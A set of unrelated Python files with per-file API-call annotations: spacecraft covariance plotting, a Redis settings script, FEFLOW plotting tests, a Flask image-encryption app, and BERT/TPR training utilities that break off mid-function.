    P_lvlh = T_inrtl_to_lvlh.dot(P[0:6, 0:6]).dot(T_inrtl_to_lvlh.T)

    fig1, pos_axes = error_ellipsoid(P_lvlh[0:3, 0:3], dof=3, xlabel='downtrack (m)', ylabel='crosstrack (m)', zlabel='radial (m)', label=label, axes = pos_axes)
    fig2, vel_axes = error_ellipsoid(P_lvlh[3:6, 3:6], dof=3, xlabel='downtrack (m/s)', ylabel='crosstrack (m/s)', zlabel='radial (m/s)', label=label, axes = vel_axes)

    if label is not None:
        pos_axes[0].legend()
        vel_axes[0].legend()

    return (fig1, fig2), (pos_axes, vel_axes)
def plot_covariance(P, **kwargs):
    """Plot the error ellipsoid of an arbitrary covariance matrix ``P``.

    Extra keyword arguments are forwarded to ``error_ellipsoid``.
    Returns the same ``(fig, axes)`` pair that ``error_ellipsoid`` produces.
    """
    return error_ellipsoid(P, dof=P.shape[0], **kwargs)
if __name__ == '__main__':
    # CLI: <labels,comma,separated> <index-or-snapshot-label> <body>
    if len(sys.argv) < 4:
        raise SyntaxError("expected run name, index number, body name")

    labels = sys.argv[1]
    selector = sys.argv[2]
    body = sys.argv[3]

    # The second argument is either a numeric snapshot index or a text label.
    try:
        count, snapshot_label = int(selector), None
    except ValueError:
        count, snapshot_label = None, selector

    loader = SpiceLoader('spacecraft')

    # Overlay every requested run onto the same pair of 3D axes.
    axes = None
    for label in labels.split(','):
        figs, axes = plot_lvlh_covariance(label,
                                          count = count,
                                          body_id = body,
                                          pos_vel_axes = axes,
                                          snapshot_label = snapshot_label)

    plt.show()
| [
"matplotlib.use",
"spiceypy.spiceypy.spkez",
"lincov.spice_loader.SpiceLoader",
"lincov.frames.compute_T_inrtl_to_lvlh",
"lincov.LinCov.load_covariance",
"matplotlib.pyplot.show"
] | [((237, 260), 'matplotlib.use', 'matplotlib.use', (['"""TKAgg"""'], {}), "('TKAgg')\n", (251, 260), False, 'import matplotlib\n'), ((873, 925), 'lincov.LinCov.load_covariance', 'LinCov.load_covariance', (['label', 'count', 'snapshot_label'], {}), '(label, count, snapshot_label)\n', (895, 925), False, 'from lincov import LinCov\n'), ((1059, 1098), 'lincov.frames.compute_T_inrtl_to_lvlh', 'frames.compute_T_inrtl_to_lvlh', (['x_inrtl'], {}), '(x_inrtl)\n', (1089, 1098), True, 'import lincov.frames as frames\n'), ((2143, 2168), 'lincov.spice_loader.SpiceLoader', 'SpiceLoader', (['"""spacecraft"""'], {}), "('spacecraft')\n", (2154, 2168), False, 'from lincov.spice_loader import SpiceLoader\n'), ((2552, 2562), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2560, 2562), True, 'import matplotlib.pyplot as plt\n'), ((970, 1024), 'spiceypy.spiceypy.spkez', 'spice.spkez', (['object_id', 'time', '"""J2000"""', '"""NONE"""', 'body_id'], {}), "(object_id, time, 'J2000', 'NONE', body_id)\n", (981, 1024), True, 'from spiceypy import spiceypy as spice\n')] |
import redis

# Connect to the shared parameter store and publish the training settings.
redis_db = redis.StrictRedis(host="nn-sq-svc", port=6379, db=0)
print(redis_db.keys())

for setting, value in (('n_samples', 100000),
                       ('epochs', 150),
                       ('batch_size', 1000),
                       ('mid_range', 10)):
    redis_db.set(setting, value)
| [
"redis.StrictRedis"
] | [((25, 77), 'redis.StrictRedis', 'redis.StrictRedis', ([], {'host': '"""nn-sq-svc"""', 'port': '(6379)', 'db': '(0)'}), "(host='nn-sq-svc', port=6379, db=0)\n", (42, 77), False, 'import redis\n')] |
import unittest
import ifm_contrib as ifm
from ifm import Enum
import numpy as np
import geopandas as gpd
import pandas as pd
class TestPlot(unittest.TestCase):
    """Smoke tests for the ``doc.c.plot`` accessors of ifm_contrib.

    Each test loads an example FEFLOW document under a Viewer license and
    invokes one plotting helper; a test passes if no exception is raised.
    """

    def _load(self, path):
        """Acquire a Viewer license and return the loaded FEFLOW document."""
        ifm.forceLicense("Viewer")
        return ifm.loadDocument(path)

    def test_faces(self):
        self.doc = self._load(r".\models\example_2D.dac")
        self.doc.c.plot.faces()

    def test_edges(self):
        self.doc = self._load(r".\models\example_2D.dac")
        self.doc.c.plot.edges()

    def test_continuous(self):
        self.doc = self._load(r".\models\example_2D.dac")
        self.doc.c.plot.continuous(par=Enum.P_HEAD)

    def test_patches(self):
        # pure triangle mesh
        self.doc = self._load(r".\models\example_2D_unconf.fem")
        self.doc.c.plot._contours(par=Enum.P_COND, style="patches")
        self.doc.c.plot.patches(par=Enum.P_COND)

    def test_fringes(self):
        self.doc = self._load(r".\models\example_2D.dac")
        self.doc.c.plot.fringes(par=Enum.P_HEAD, alpha=1, cmap="feflow_blue_green_red")

    def test_isolines(self):
        self.doc = self._load(r".\models\example_2D.dac")
        self.doc.c.plot.isolines(par=Enum.P_HEAD, colors="black")

    def test_obs_markers(self):
        self.doc = self._load(r".\models\example_2D.dac")
        self.doc.c.plot.obs_markers()
        self.doc.c.plot.obs_markers(filter_by={"label": ["myObsPoint1", "myObsPoint2"]})

    def test_obs_labels(self):
        self.doc = self._load(r".\models\example_2D.dac")
        self.doc.c.plot.obs_labels()
        self.doc.c.plot.obs_labels(filter_by={"label": ["myObsPoint1", "myObsPoint2"]})


if __name__ == '__main__':
    unittest.main()
| [
"unittest.main",
"ifm_contrib.loadDocument",
"ifm_contrib.forceLicense"
] | [((1894, 1909), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1907, 1909), False, 'import unittest\n'), ((197, 223), 'ifm_contrib.forceLicense', 'ifm.forceLicense', (['"""Viewer"""'], {}), "('Viewer')\n", (213, 223), True, 'import ifm_contrib as ifm\n'), ((243, 288), 'ifm_contrib.loadDocument', 'ifm.loadDocument', (['""".\\\\models\\\\example_2D.dac"""'], {}), "('.\\\\models\\\\example_2D.dac')\n", (259, 288), True, 'import ifm_contrib as ifm\n'), ((355, 381), 'ifm_contrib.forceLicense', 'ifm.forceLicense', (['"""Viewer"""'], {}), "('Viewer')\n", (371, 381), True, 'import ifm_contrib as ifm\n'), ((401, 446), 'ifm_contrib.loadDocument', 'ifm.loadDocument', (['""".\\\\models\\\\example_2D.dac"""'], {}), "('.\\\\models\\\\example_2D.dac')\n", (417, 446), True, 'import ifm_contrib as ifm\n'), ((518, 544), 'ifm_contrib.forceLicense', 'ifm.forceLicense', (['"""Viewer"""'], {}), "('Viewer')\n", (534, 544), True, 'import ifm_contrib as ifm\n'), ((564, 609), 'ifm_contrib.loadDocument', 'ifm.loadDocument', (['""".\\\\models\\\\example_2D.dac"""'], {}), "('.\\\\models\\\\example_2D.dac')\n", (580, 609), True, 'import ifm_contrib as ifm\n'), ((698, 724), 'ifm_contrib.forceLicense', 'ifm.forceLicense', (['"""Viewer"""'], {}), "('Viewer')\n", (714, 724), True, 'import ifm_contrib as ifm\n'), ((744, 796), 'ifm_contrib.loadDocument', 'ifm.loadDocument', (['""".\\\\models\\\\example_2D_unconf.fem"""'], {}), "('.\\\\models\\\\example_2D_unconf.fem')\n", (760, 796), True, 'import ifm_contrib as ifm\n'), ((972, 998), 'ifm_contrib.forceLicense', 'ifm.forceLicense', (['"""Viewer"""'], {}), "('Viewer')\n", (988, 998), True, 'import ifm_contrib as ifm\n'), ((1018, 1063), 'ifm_contrib.loadDocument', 'ifm.loadDocument', (['""".\\\\models\\\\example_2D.dac"""'], {}), "('.\\\\models\\\\example_2D.dac')\n", (1034, 1063), True, 'import ifm_contrib as ifm\n'), ((1189, 1215), 'ifm_contrib.forceLicense', 'ifm.forceLicense', (['"""Viewer"""'], {}), "('Viewer')\n", (1205, 1215), True, 
'import ifm_contrib as ifm\n'), ((1235, 1280), 'ifm_contrib.loadDocument', 'ifm.loadDocument', (['""".\\\\models\\\\example_2D.dac"""'], {}), "('.\\\\models\\\\example_2D.dac')\n", (1251, 1280), True, 'import ifm_contrib as ifm\n'), ((1387, 1413), 'ifm_contrib.forceLicense', 'ifm.forceLicense', (['"""Viewer"""'], {}), "('Viewer')\n", (1403, 1413), True, 'import ifm_contrib as ifm\n'), ((1433, 1478), 'ifm_contrib.loadDocument', 'ifm.loadDocument', (['""".\\\\models\\\\example_2D.dac"""'], {}), "('.\\\\models\\\\example_2D.dac')\n", (1449, 1478), True, 'import ifm_contrib as ifm\n'), ((1645, 1671), 'ifm_contrib.forceLicense', 'ifm.forceLicense', (['"""Viewer"""'], {}), "('Viewer')\n", (1661, 1671), True, 'import ifm_contrib as ifm\n'), ((1691, 1736), 'ifm_contrib.loadDocument', 'ifm.loadDocument', (['""".\\\\models\\\\example_2D.dac"""'], {}), "('.\\\\models\\\\example_2D.dac')\n", (1707, 1736), True, 'import ifm_contrib as ifm\n')] |
import os
import uuid
from werkzeug.utils import secure_filename
from pathlib import Path
import random
from flask import Flask, flash, request, redirect, url_for, render_template, jsonify
from flask_cors import CORS, cross_origin
import chaosencryptor.src.models
from PIL import Image
import json
# Module-level configuration and Flask application setup.
DEBUG = False
dirp = Path(__file__).parents[0]
template_folder = os.path.join(dirp, 'templates')
static_folder = os.path.join(template_folder, 'static')
# NOTE(review): single-argument join returns static_folder unchanged, so the
# media folder is the static folder itself — confirm this is intended.
media_folder = os.path.join(static_folder)
media_base_url = '/static'
app = Flask(__name__, template_folder=template_folder, static_folder=static_folder)
cors = CORS(app)
# media folder should be in static
app.config['UPLOAD_FOLDER'] = media_folder
app.config['MAX_CONTENT_LENGTH'] = 16*1024*1024 # 16MB upload size cap
app.config['NEXT_IMAGE_ID'] = 1  # monotonically increasing id for uploads
app.config['store'] = {'images': {}, 'current_upimg': None}
# File extensions (lower-case, without the dot) accepted for upload.
IMAGE_EXTENSIONS = {'png'}

def verify_image_extension(s):
    """Return True if filename *s* has an extension listed in IMAGE_EXTENSIONS.

    The check is case-insensitive; names without a dot are rejected.
    """
    return '.' in s and s.rsplit('.', 1)[1].lower() in IMAGE_EXTENSIONS
@app.route('/')
def main():
    """Serve the single-page front end (templates/index.html)."""
    return render_template('index.html')
@app.route('/upimg', methods=['POST'])
def upimg():
    """Accept a PNG upload, save it under a collision-free name and register it.

    Returns a JSON payload with ``uploaded``/``message`` plus ``id`` and
    ``url`` on success; HTTP 404 for missing file/filename, 415 for a
    disallowed extension, 200 on success.
    """
    result = {'uploaded': False}
    upload = request.files.get('file')
    if upload is None:
        result['message'] = 'No file found'
        return result, 404
    if not upload or not upload.filename:
        result['message'] = 'No filename selected'
        return result, 404
    if not verify_image_extension(upload.filename):
        result['message'] = 'File extension not allowed'
        return result, 415
    # Success: build "<id>_<uuid>.<ext>" inside the upload folder.
    image_id = app.config['NEXT_IMAGE_ID']
    extension = upload.filename.rsplit('.', 1)[1].lower()
    unique_part = secure_filename(str(uuid.uuid4()))
    new_filename = f'{image_id}_{unique_part}.{extension}'
    img_path = os.path.join(app.config['UPLOAD_FOLDER'], new_filename)
    url = f'{media_base_url}/{new_filename}'
    app.config['store']['images'][image_id] = {
        '_name': new_filename,
        'url': url
    }
    result['message'] = 'Image uploaded'
    result['id'] = image_id
    result['url'] = url
    result['uploaded'] = True
    app.config['NEXT_IMAGE_ID'] = image_id + 1
    upload.save(img_path)
    app.config['store']['current_upimg'] = img_path
    return result, 200
@app.route('/encrypt', methods=['GET'])
def encrypt():
    """Encrypt the most recently uploaded image with the selected chaos model.

    Returns a JSON payload with the serialized key and the URL of the
    encrypted image.
    """
    # Model name comes straight from the query string and is resolved by
    # attribute lookup — NOTE(review): no validation; an unknown name raises.
    model = request.args.get('model')
    encrypter = getattr(chaosencryptor.src.models, model)()
    im = Image.open(app.config['store']['current_upimg'])
    name = im.filename
    im = im.convert('RGB')
    image, key = encrypter.encrypt(image=im, name=name)
    # Random suffix keeps repeated encryptions of the same source distinct.
    img_path = f'{name.rsplit(".", 1)[0]}_encrypted{random.randint(0, 99999)}.png'
    image.save(img_path)
    app.config['store']['current_encryptimg'] = img_path
    result = {
        'message': 'Image encrypted',
        'key': json.dumps(key),
        'url': f'{media_base_url}/{os.path.basename(img_path)}'
    }
    return result, 200
@app.route('/decrypt', methods=['POST'])
def decrypt():
    """Decrypt the most recently uploaded image using the posted key.

    Expects form fields ``keystring`` (JSON-encoded key) and ``model``;
    returns the URL of the decrypted image, or HTTP 404 if no key is given.
    """
    result = {'uploaded': False}
    keystring = request.form.get('keystring')
    model = request.form.get('model')
    if not keystring:
        result['message'] = 'No key provided'
        return result, 404
    # Success
    # open the current uploaded image
    im = Image.open(app.config['store']['current_upimg'])
    name = im.filename
    im = im.convert('RGB')
    # load the json string
    # NOTE(review): stripping every backslash assumes the client escaped the
    # JSON and that keys never legitimately contain backslashes — confirm.
    key = json.loads(keystring.replace('\\', ''))
    decrypter = getattr(chaosencryptor.src.models, model)()
    image = decrypter.decrypt(image=im, key=key)
    # Random suffix keeps repeated decryptions distinct on disk.
    img_path = f'{name.rsplit(".", 1)[0]}_decrypted{random.randint(0, 99999)}.png'
    image.save(img_path)
    app.config['store']['current_decryptimg'] = img_path
    result = {
        'message': 'Image decrypted',
        'url': f'{media_base_url}/{os.path.basename(img_path)}'
    }
    return result, 200
if DEBUG:
    # Introspection endpoints, registered only when DEBUG is set at import time.
    @app.route('/images', methods=['GET'])
    def images():
        """Return the full id -> metadata map of uploaded images."""
        return app.config['store']['images'], 200

    @app.route('/images/<int:id>', methods=['GET'])
    def images_id(id):
        """Return the metadata of one uploaded image, or 404 if unknown."""
        if app.config['store']['images'].get(id):
            return app.config['store']['images'][id], 200
        else:
            return {'message': 'Did not find image'}, 404
if __name__ == '__main__':
    if DEBUG:
        # Development server with auto-reload on code changes.
        app.run(debug=True, use_reloader=True)
    else:
        app.run()
| [
"flask.render_template",
"flask.request.args.get",
"PIL.Image.open",
"flask_cors.CORS",
"flask.Flask",
"pathlib.Path",
"json.dumps",
"os.path.join",
"flask.request.form.get",
"uuid.uuid4",
"os.path.basename",
"random.randint"
] | [((364, 395), 'os.path.join', 'os.path.join', (['dirp', '"""templates"""'], {}), "(dirp, 'templates')\n", (376, 395), False, 'import os\n'), ((412, 451), 'os.path.join', 'os.path.join', (['template_folder', '"""static"""'], {}), "(template_folder, 'static')\n", (424, 451), False, 'import os\n'), ((467, 494), 'os.path.join', 'os.path.join', (['static_folder'], {}), '(static_folder)\n', (479, 494), False, 'import os\n'), ((529, 606), 'flask.Flask', 'Flask', (['__name__'], {'template_folder': 'template_folder', 'static_folder': 'static_folder'}), '(__name__, template_folder=template_folder, static_folder=static_folder)\n', (534, 606), False, 'from flask import Flask, flash, request, redirect, url_for, render_template, jsonify\n'), ((614, 623), 'flask_cors.CORS', 'CORS', (['app'], {}), '(app)\n', (618, 623), False, 'from flask_cors import CORS, cross_origin\n'), ((1025, 1054), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (1040, 1054), False, 'from flask import Flask, flash, request, redirect, url_for, render_template, jsonify\n'), ((1760, 1815), 'os.path.join', 'os.path.join', (["app.config['UPLOAD_FOLDER']", 'new_filename'], {}), "(app.config['UPLOAD_FOLDER'], new_filename)\n", (1772, 1815), False, 'import os\n'), ((2399, 2424), 'flask.request.args.get', 'request.args.get', (['"""model"""'], {}), "('model')\n", (2415, 2424), False, 'from flask import Flask, flash, request, redirect, url_for, render_template, jsonify\n'), ((2496, 2544), 'PIL.Image.open', 'Image.open', (["app.config['store']['current_upimg']"], {}), "(app.config['store']['current_upimg'])\n", (2506, 2544), False, 'from PIL import Image\n'), ((3105, 3134), 'flask.request.form.get', 'request.form.get', (['"""keystring"""'], {}), "('keystring')\n", (3121, 3134), False, 'from flask import Flask, flash, request, redirect, url_for, render_template, jsonify\n'), ((3147, 3172), 'flask.request.form.get', 'request.form.get', (['"""model"""'], {}), "('model')\n", 
(3163, 3172), False, 'from flask import Flask, flash, request, redirect, url_for, render_template, jsonify\n'), ((3335, 3383), 'PIL.Image.open', 'Image.open', (["app.config['store']['current_upimg']"], {}), "(app.config['store']['current_upimg'])\n", (3345, 3383), False, 'from PIL import Image\n'), ((320, 334), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (324, 334), False, 'from pathlib import Path\n'), ((2888, 2903), 'json.dumps', 'json.dumps', (['key'], {}), '(key)\n', (2898, 2903), False, 'import json\n'), ((2704, 2728), 'random.randint', 'random.randint', (['(0)', '(99999)'], {}), '(0, 99999)\n', (2718, 2728), False, 'import random\n'), ((3676, 3700), 'random.randint', 'random.randint', (['(0)', '(99999)'], {}), '(0, 99999)\n', (3690, 3700), False, 'import random\n'), ((2940, 2966), 'os.path.basename', 'os.path.basename', (['img_path'], {}), '(img_path)\n', (2956, 2966), False, 'import os\n'), ((3880, 3906), 'os.path.basename', 'os.path.basename', (['img_path'], {}), '(img_path)\n', (3896, 3906), False, 'import os\n'), ((1722, 1734), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (1732, 1734), False, 'import uuid\n')] |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import os
from modules.model import BertForSequenceClassification_tpr
from utils.data_utils import convert_examples_to_features, logger
from transformers.file_utils import PYTORCH_PRETRAINED_BERT_CACHE
from transformers.modeling_bert import BertModel
from transformers.optimization import AdamW, WarmupLinearSchedule
from torch.optim import SGD
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
from torch.utils.data.distributed import DistributedSampler
def prepare_data_loader(args, processor, label_list, task_type, task, tokenizer, split, examples=None, single_sentence=False,
                        return_pos_tags=False, return_ner_tags=False, return_dep_parse=False, return_const_parse=False):
    """Featurize one dataset split and wrap it in a DataLoader.

    Args:
        args: experiment arguments (data_dir, max_seq_length, batch sizes,
            local_rank, save_tpr_attentions).
        processor: task-specific processor providing get_*_examples().
        label_list: list of class labels for the task.
        task_type: 1 selects float (regression) labels, otherwise long labels.
        task: task name; also the sub-directory of args.data_dir to read from.
        tokenizer: tokenizer used during featurization.
        split: one of 'train', 'dev', 'test'.
        examples: optional pre-loaded examples; read from disk when None.
        single_sentence: treat inputs as single sentences (no sentence pair).
        return_*: which linguistic structure features to extract.

    Returns:
        (dataloader, all_guids, structure_features) where structure_features
        is the tuple (all_tokens, token_pos, token_ner, token_dep, token_const).
    """
    data_dir = os.path.join(args.data_dir, task)
    if examples is None:
        if split == 'train':
            examples = processor.get_train_examples(data_dir)
        if split == 'dev':
            examples = processor.get_dev_examples(data_dir)
        if split == 'test':
            examples = processor.get_test_examples(data_dir)
    features, structure_features = convert_examples_to_features(examples, label_list, args.max_seq_length, tokenizer, single_sentence,
                                                                 return_pos_tags, return_ner_tags, return_dep_parse, return_const_parse)
    all_tokens, token_pos, token_ner, token_dep, token_const = structure_features
    logger.info("***** preparing data *****")
    logger.info("  Num examples = %d", len(examples))
    batch_size = args.train_batch_size if split == 'train' else args.eval_batch_size
    logger.info("  Batch size = %d", batch_size)
    all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
    all_input_mask = torch.tensor([f.input_mask for f in features], dtype=torch.uint8)
    all_segment_ids = torch.tensor([f.segment_ids for f in features], dtype=torch.long)
    all_sub_word_masks = torch.tensor([f.sub_word_masks for f in features], dtype=torch.uint8)
    all_orig_to_token_maps = torch.tensor([f.orig_to_token_map for f in features], dtype=torch.long)
    if split == 'test':
        # Only the SNLI test set carries labels here; other test sets are built
        # without a label tensor.
        if task.lower() == 'snli':
            all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long)
            data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_sub_word_masks, all_orig_to_token_maps, all_label_ids)
        else:
            data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_sub_word_masks, all_orig_to_token_maps)
    else:
        # task_type == 1 means float labels (regression), otherwise long labels.
        if task_type != 1:
            all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long)
        else:
            all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.float32)
        data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_sub_word_masks, all_orig_to_token_maps, all_label_ids)
    # Shuffle only during normal training; sequential order is kept otherwise,
    # presumably so saved TPR attentions align with example order — confirm.
    if split == 'train' and not args.save_tpr_attentions:
        if args.local_rank == -1:
            sampler = RandomSampler(data)
        else:
            sampler = DistributedSampler(data)
    else:
        sampler = SequentialSampler(data)
    all_guids = [f.guid for f in features]
    dataloader = DataLoader(data, sampler=sampler, batch_size=batch_size)
    return dataloader, all_guids, structure_features
def prepare_optim(args, num_train_steps, param_optimizer):
    """Create the optimizer (and optional LR scheduler) for training.

    Weight decay of 0.01 is applied to all parameters except biases and
    LayerNorm parameters, which get 0.0.

    Args:
        args: experiment flags (fp16, loss_scale, optimizer, learning_rate,
            warmup_proportion, local_rank).
        num_train_steps: total number of optimization steps.
        param_optimizer: iterable of (name, parameter) pairs.

    Returns:
        (optimizer, scheduler, t_total); scheduler is None except on the
        AdamW path.

    Raises:
        ImportError: if fp16 is requested but apex is not installed.
        ValueError: if args.optimizer names an unsupported optimizer.
    """
    no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
    optimizer_grouped_parameters = [
        {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},
        {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
    ]
    t_total = num_train_steps
    scheduler = None
    if args.local_rank != -1:
        # Each distributed worker only performs its share of the total steps.
        t_total = t_total // torch.distributed.get_world_size()
    if args.fp16:
        try:
            from apex.optimizers import FP16_Optimizer
            from apex.optimizers import FusedAdam
        except ImportError:
            raise ImportError(
                "Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")
        optimizer = FusedAdam(optimizer_grouped_parameters,
                              lr=args.learning_rate,
                              bias_correction=False,
                              max_grad_norm=1.0)
        if args.loss_scale == 0:
            optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True)
        else:
            optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale)
    elif args.optimizer == 'adam':
        optimizer = AdamW(optimizer_grouped_parameters,
                          lr=args.learning_rate,
                          correct_bias=False)
        scheduler = WarmupLinearSchedule(optimizer, warmup_steps=args.warmup_proportion * t_total, t_total=t_total)
    elif args.optimizer == 'sgd':
        optimizer = SGD(optimizer_grouped_parameters,
                        lr=args.learning_rate)
    else:
        # Previously an unknown optimizer name fell through and crashed with an
        # UnboundLocalError at the return statement; fail fast instead.
        raise ValueError('unsupported optimizer: {!r}'.format(args.optimizer))
    return optimizer, scheduler, t_total
def prepare_model(args, opt, num_labels, task_type, device, n_gpu, loading_path=None):
    """Build the TPR-augmented BERT classifier and optionally warm-start /
    freeze selected parameter groups from a checkpoint.

    Args:
        args: experiment flags (bert_model, num_bert_layers, temperature,
            max_seq_length, fp16, local_rank, plus load_* / freeze_* flags).
        opt: extra keyword options forwarded to the model constructor.
        num_labels: number of output classes.
        task_type: task type forwarded to the model.
        device: torch device to place the model on.
        n_gpu: number of visible GPUs (DataParallel is used when > 1).
        loading_path: optional checkpoint path for selective warm-starting.

    Returns:
        (model, bert_config)
    """
    # Load config and pre-trained model
    pre_trained_model = BertModel.from_pretrained(args.bert_model, cache_dir=PYTORCH_PRETRAINED_BERT_CACHE / 'distributed_{}'.format(args.local_rank))
    bert_config = pre_trained_model.config
    # modify config
    bert_config.num_hidden_layers = args.num_bert_layers
    model = BertForSequenceClassification_tpr(bert_config,
                                              num_labels=num_labels,
                                              task_type=task_type,
                                              temperature=args.temperature,
                                              max_seq_len=args.max_seq_length,
                                              **opt)
    # load desired layers from config
    model.bert.load_state_dict(pre_trained_model.state_dict(), strict=False)
    # initialize Symbol and Filler parameters from a checkpoint instead of randomly initializing them
    if loading_path:
        logger.info('loading model checkpoint from {}'.format(loading_path))
        # NOTE(review): single-argument os.path.join is a no-op; loading_path
        # is used directly as the checkpoint file path.
        output_model_file = os.path.join(loading_path)
        states = torch.load(output_model_file, map_location=device)
        model_state_dict = states['state_dict']
        # options shouldn't be loaded from the pre-trained model
        # opt = states['options']
        # Collect the checkpoint keys selected by the load_* flags.
        desired_keys = []
        if args.load_role:
            logger.info('loading roles from checkpoint model')
            desired_keys.extend(['head.R.weight', 'head.R.bias'])
        if args.load_filler:
            logger.info('loading fillers from checkpoint model')
            desired_keys.extend(['head.F.weight', 'head.F.bias'])
        if args.load_role_selector:
            logger.info('loading role selectors from checkpoint model')
            desired_keys.extend(['head.WaR.weight', 'head.WaR.bias'])
            desired_keys.extend([name for name in model_state_dict.keys() if name.startswith('head.enc_aR')])
        if args.load_filler_selector:
            logger.info('loading filler selectors from checkpoint model')
            desired_keys.extend(['head.WaF.weight', 'head.WaF.bias'])
            desired_keys.extend([name for name in model_state_dict.keys() if name.startswith('head.enc_aF')])
        if args.load_bert_params:
            logger.info('loading bert params from checkpoint model')
            desired_keys.extend([name for name in model_state_dict.keys() if name.startswith('bert')])
        if args.load_classifier:
            logger.info('loading classifier params from checkpoint model')
            desired_keys.extend([name for name in model_state_dict.keys() if name.startswith('classifier')])
        if args.load_LSTM_params:
            logger.info('loading LSTM params from checkpoint model')
            desired_keys.extend([name for name in model_state_dict.keys() if name.startswith('head.rnn')])
        # Copy only the selected entries and merge them into the fresh model.
        state = dict()
        for key, val in model_state_dict.items():
            if key in desired_keys:
                state[key] = val
        model.load_state_dict(state, strict=False)
        # Freeze the parameter groups selected by the freeze_* flags.
        frozen_keys = []
        if args.freeze_role:
            logger.info('freezing roles if loaded from ckpt model')
            frozen_keys.extend(['head.R.weight', 'head.R.bias'])
        if args.freeze_filler:
            logger.info('freezing fillers if loaded from ckpt model')
            frozen_keys.extend(['head.F.weight', 'head.F.bias'])
        if args.freeze_role_selector:
            logger.info('freezing role selectors if loaded from ckpt model')
            frozen_keys.extend(['head.WaR.weight', 'head.WaR.bias'])
            frozen_keys.extend([name for name in model_state_dict.keys() if name.startswith('head.enc_aR')])
        if args.freeze_filler_selector:
            logger.info('freezing filler selectors if loaded from ckpt model')
            frozen_keys.extend(['head.WaF.weight', 'head.WaF.bias'])
            frozen_keys.extend([name for name in model_state_dict.keys() if name.startswith('head.enc_aF')])
        if args.freeze_bert_params:
            logger.info('freezing bert params if loaded from ckpt model')
            frozen_keys.extend([name for name in model_state_dict.keys() if name.startswith('bert')])
        if args.freeze_classifier:
            logger.info('freezing classifier params if loaded from ckpt model')
            frozen_keys.extend([name for name in model_state_dict.keys() if name.startswith('classifier')])
        if args.freeze_LSTM_params:
            logger.info('freezing LSTM params if loaded from ckpt model')
            frozen_keys.extend([name for name in model_state_dict.keys() if name.startswith('head.rnn')])
        for name, param in model.named_parameters():
            if name in frozen_keys:
                param.requires_grad = False
    if args.fp16:
        model.half()
    model.to(device)
    if args.local_rank != -1:
        try:
            from apex.parallel import DistributedDataParallel as DDP
        except ImportError:
            raise ImportError(
                "Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")
        model = DDP(model)
    elif n_gpu > 1:
        model = torch.nn.DataParallel(model)
    return model, bert_config
def prepare_structure_values(args, eval_task_name, all_ids, F_list, R_list, F_full, R_full, all_tokens, token_pos, token_ner, token_dep, token_const):
    """Assemble per-example dictionaries of tokens, TPR attention values and
    optional linguistic annotations, keyed by example id.

    Args:
        args: flags selecting the annotations to attach (single_sentence,
            return_POS, return_NER, return_DEP, return_CONST).
        eval_task_name: task name; 'sst'/'cola' are treated as single-sentence.
        all_ids: example ids, parallel to the remaining per-example lists.
        F_list, R_list: per-token filler/role attention lists.
        F_full, R_full: per-token full filler/role attention lists.
        all_tokens, token_pos, token_ner, token_dep, token_const: structure
            features as produced by prepare_data_loader.

    Returns:
        dict mapping example id -> per-example value dict; examples whose
        parallel lists disagree in length are skipped and counted.
    """
    values = {}
    if args.single_sentence or eval_task_name.lower() in ['sst', 'cola']:
        # Single-sentence tasks: take the first (only) sentence of each example.
        index = 0
        tokens = [val[index] for val in all_tokens]
        pos_tags = [[subval[1] for subval in val[index]] for val in token_pos]
        ner_tags = [[subval[1] for subval in val[index]] for val in token_ner]
        dep_parse_tokens = [[subval[0] for subval in val[index]] for val in token_dep]
        dep_parse = [[subval[1] for subval in val[index]] for val in token_dep]
        const_parse = [[subval[1] for subval in val[index]] for val in token_const]
        parse_tree_depth = [[len(subval[1]) for subval in val[index]] for val in token_const]
    else:
        # Sentence-pair tasks: extract both sentences, then join them with a
        # separator token so annotation lists stay aligned with the tokens.
        tokens = []
        pos_tags = []
        ner_tags = []
        dep_parse_tokens = []
        dep_parse = []
        const_parse = []
        parse_tree_depth = []
        index = 0
        tokens_a = [val[index] for val in all_tokens]
        pos_tags_a = [[subval[1] for subval in val[index]] for val in token_pos]
        ner_tags_a = [[subval[1] for subval in val[index]] for val in token_ner]
        dep_parse_tokens_a = [[subval[0] for subval in val[index]] for val in token_dep]
        dep_parses_a = [[subval[1] for subval in val[index]] for val in token_dep]
        const_parses_a = [[subval[1] for subval in val[index]] for val in token_const]
        parse_tree_depths_a = [[len(subval[1]) for subval in val[index]] for val in token_const]
        index = 1
        tokens_b = [val[index] for val in all_tokens]
        pos_tags_b = [[subval[1] for subval in val[index]] for val in token_pos]
        ner_tags_b = [[subval[1] for subval in val[index]] for val in token_ner]
        dep_parse_tokens_b = [[subval[0] for subval in val[index]] for val in token_dep]
        dep_parses_b = [[subval[1] for subval in val[index]] for val in token_dep]
        const_parses_b = [[subval[1] for subval in val[index]] for val in token_const]
        parse_tree_depths_b = [[len(subval[1]) for subval in val[index]] for val in token_const]
        for token_a, token_b in zip(tokens_a, tokens_b):
            tokens.append(token_a + ['[SEP]'] + token_b)
        # NOTE(review): POS uses 'SEP' (no brackets) while the other lists use
        # '[SEP]' — confirm whether this asymmetry is intentional.
        for pos_tag_a, pos_tag_b in zip(pos_tags_a, pos_tags_b):
            pos_tags.append(pos_tag_a + ['SEP'] + pos_tag_b)
